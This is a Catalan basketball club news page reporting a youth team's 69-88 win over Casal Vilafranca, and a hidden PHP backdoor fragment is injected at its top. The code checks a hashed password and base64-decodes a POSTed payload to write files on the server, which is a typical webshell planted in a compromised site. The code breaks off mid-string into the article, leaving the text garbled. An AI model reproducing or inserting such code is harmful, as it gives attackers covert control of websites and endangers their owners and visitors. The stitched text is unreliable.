function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" L'infantil masculí 06 A fa un tercer quart per emmarcar i derrota el Casal Vilafranca (69-88) - Tgn Bàsquet Club -

L’infantil masculí 06 A fa un tercer quart per emmarcar i derrota el Casal Vilafranca (69-88)

Updated: octubre 8, 2019

L’equip infantil masculí 06 A va derrotar el Casal Vilafranca en un bon partit i, sobretot, després d’un gran tercer quart. Els tarragonins van tenir dificultats en els primers minuts a l’hora d’ajustar la seva defensa pressionant i això va provocar que els locals anotessin amb certa facilitat. En el segon quart van millorar una mica aquest aspecte però en atac, el TGN Bàsquet no va estar inspirat (43-41 al descans).

Va ser en el tercer quart quan es va fonamentar el triomf. Els liles van apostar per una defensa individual molt intensa que va ser decisiva. El TGN Bàsquet va recuperar moltes pilotes i va sortir al contraatac, marcant un parcial de 3-22. Tot i que en l’últim període no van jugar tan bé, els visitants van saber administrar l’avantatge i es van endur un triomf d’or.